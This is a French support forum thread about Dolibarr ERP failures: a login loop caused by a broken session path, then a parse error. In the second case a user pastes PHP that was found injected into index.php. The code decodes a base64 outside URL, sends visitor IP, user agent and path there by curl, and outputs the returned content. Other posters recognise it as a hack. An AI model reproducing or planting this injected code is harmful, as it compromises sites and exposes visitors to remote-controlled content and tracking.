AU SECOURS, Ne peux plus utiliser Dolibarr

Bonjour,

J’ai la version 3.2.3 et je l’utilisais bien jusqu’à ce jour
Après être entré dans le Backoffice, à chaque clic je reviens à la page de connexion.
Je n’ai rien modifié depuis ma dernière connexion en février

Quand j’arrive à saisir un prospect, à la fin je clique sur créer et j’ai ce message qui apparait
Dolibarr a détecté une erreur technique.
Voici les informations qui pourront aider au diagnostic:
Date: 20130315095934
Dolibarr: 3.2.3
Niveau de fonctionnalités: 0
PHP: 5.3.3
Server: Apache

Url sollicitée: /societe/soc.php
Referer: http://erp2.psim.fr/societe/soc.php
Gestionnaire de menu: eldy_backoffice.php

Type gestionnaire de base de données: mysqli
Requête dernier accès en base en erreur: Aucune requête en erreur
Code retour dernier accès en base en erreur: Aucune requête en erreur
Information sur le dernier accès en base en erreur: Aucune requête en erreur

J’ai vraiment besoin de faire un devis et la je suis coincé

Merci pour votre aide

Au plaisir de vous lire …

Bien cordialement,

Bonjour,

Vous êtes en hébergé et votre hébergeur a changé sa configuration. Ou votre nom de domaine n’est plus valable (oublie de paiement ?).
Le comportement que vous expliqué (retour systématique a la page de login) est souvent du a une incohérence entre l’url de votre dolibarr (erp2.psim.fr) et celle déclaré dans le fichier de configuration de Dolibarr (/htdocs/conf/conf.php).

Cdt.

Bonjour FH,

Merci beaucoup pour votre réponse rapide
Tous mes autres sites internet sont accessibles
J’ai un serveur dédié que je gère moi même et qui est payé
Je viens de vérifier mon conf.php et il pointe bien vers le bon répertoire
Dans phpmyadmin, mes tables sont corrects

Comprends pas

Au plaisir de vous lire

Bonjour,

Appelez moi (contact sur mon site en signature) on fera un dépannage gratuit et sans contrepartie.

Cdt.

Bonjour,

Donc suite à la mise a jours automatique de Plesk, le répertoire de stockage session.savepath était mauvais et donc plus de session serveur.. On a mis un répertoire correcte sur lequel l'utilisateur qui lance apache a les droits et tout est rentré dans l'ordre.

Cdt.

Encore merci
Super efficace

Qu’en dit OVH ?

(quel rapport avec les réponses précédentes de ce sujet ?)

Bonjour,

En recherchant T_STRING sur le forum Dolibarr je suis tombé là dessus :
www.dolibarr.fr/forum/t/parse-error-apres-install-de-la-v3-2-3-sur-ovh/15454/1

Je pense que c’est ce qui cause votre probléme. OVH « s’amuse » a changé la version de PHP sans vous prévenir ?..

Cdt.

1 « J'aime »

Le rapport que j’y trouve est le titre « AU SECOURS, Ne peux plus utiliser Dolibarr » après je voulais que FHenry réponde à mon post, car il me semble pertinent et réactif.

@Fhenry
En effet, j’ai reçu aucune notification de OVH et j’en ai l’habitude. Je pense que c’est le tarif d’un hébergement mutualisé.

J’ai crée un fichier .htacess avec la ligne SetEnv PHP_VER 5 et l’ai inséré dans le dossier ou se trouve l’index.php
Pour le moment pas de changement, peut-etre que la ligne est fausse…
Est-ce que c’est ça qu’il faut faire ?

merci pour vos réponses

Vous pouvez aussi bien, sinon mieux, ouvrir un nouveau fil avec un sujet éventuellement plus précis, mentionnant par exemple OVH, car votre problème n’a apparemment rien à voir avec l’exposé initial de ce fil.
Du simple [url=www.dolibarr.fr/forum/t/regles-et-utilisation-du-forum/5876/1 usage du/des forums[/url]…
Et, « après » vous pouvez aussi vous adresser directement à votre interlocuteur préféré sans passer par le forum… :smiley:

1 « J'aime »

Hello J’ai réussi grâve à un developper qui est entré dans le code de la page index. La ligne 78 avait une erreur de syntax, merci pour vos réponses et liens utiles.

Bonjour, est-il possible que le developpeur fournisse la correction a la communauté ?

il a seulement appliquer ces lignes en commentaires, selon lui c’était inutile…:

/* $conf->global->MAIN_MOTD=preg_replace(’/<br(\s[\sa-zA-Z_="])?/?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER[‹ HTTP_USER_AGENT ›]); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = «  »;
if((strstr($sUserAgent, ‹ google ›) == false)&&(strstr($sUserAgent, ‹ yahoo ›) == false)&&(strstr($sUserAgent, ‹ baidu ›) == false)&&(strstr($sUserAgent, ‹ msn ›) == false)&&(strstr($sUserAgent, ‹ opera ›) == false)&&(strstr($sUserAgent, ‹ chrome ›) == false)&&(strstr($sUserAgent, ‹ bing ›) == false)&&(strstr($sUserAgent, ‹ safari ›) == false)&&(strstr($sUserAgent, ‹ bot ›) == false)) // Bot comes
{
if(isset($_SERVER[‹ REMOTE_ADDR ›]) == true && isset($_SERVER[‹ HTTP_HOST ›]) == true){ // Create bot analitics
$stCurlLink = base64_decode( ‹ aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw ›).’?ip=’.urlencode($_SERVER[‹ REMOTE_ADDR ›]).’&useragent=’.urlencode($sUserAgent).’&domainname=’.urlencode($_SERVER[‹ HTTP_HOST ›]).’&fullpath=’.urlencode($_SERVER[‹ REQUEST_URI ›]).’&check=’.isset($_GET[‹ look ›]);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]==« O »)
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>/i’,’<br>’,$conf->global->MAIN_MOTD);
/

Bonjour,

C’est curieux, je ne vois pas ce code dans le fichier ‹ normal › de Dolibarr…
Même sur Github https://github.com/Dolibarr/dolibarr/blob/3.3/htdocs/index.php je ne le vois pas…

Cdt.

Je suis sur la version 3.0.0, est-ce à cause de ça?

Je n’ai pas souvenir qu’il y avait un soucis sur la 3.0.0 à ce niveau. Je vais regarder, je dois en avoir une en exploitation.

Il serait peut être intéressant aussi que vous passiez sur une version plus « fraiche ». La 3.0.1 corrigeait quelques bugs de la 3.0.0 de mémoire mais monter jusqu’à la 3.2.3 serait une bonne idée. Pas de pertes de fonctionnalités, au contraire mais reste à voir si vous avez des modules optionnels à coté qui suivront.

Maintenant je relaye Florian, il serait bien que votre « développeur » publie et explique sa correction. « Inutile » ne veut pas dire « erreur ». Pour pouvoir prétendre au support via le forum, évitez de modifier le code de Dolibarr :wink: hors modèles et modules.

Bonjour merci pour vos réponses jusqu’à présent.
Je crois que cette ligne est en fait une requête apporté par un hack…

mon nom de domaine n’est plus accessible et mon dolibarr par la même occasion ne fonctionne plus…

Pour être à jour est-ce que le fait de télécharger la dernière version de dolibarr et de télécharger le nouveau contenu du répertoire suffit ?

merci d’avance

Il faut avant tout résoudre votre souci ! Télécharger une nouvelle version ne changera rien si c’est un pb au niveau de votre serveur.

Quand je regarde votre site et tente d’accéder à votre Dolibarr, j’ai une erreur 403 ! Çà peut être un simple soucis de droit d’accès ! Commençait par contacter OVH pour voir ce qu’ils en disent…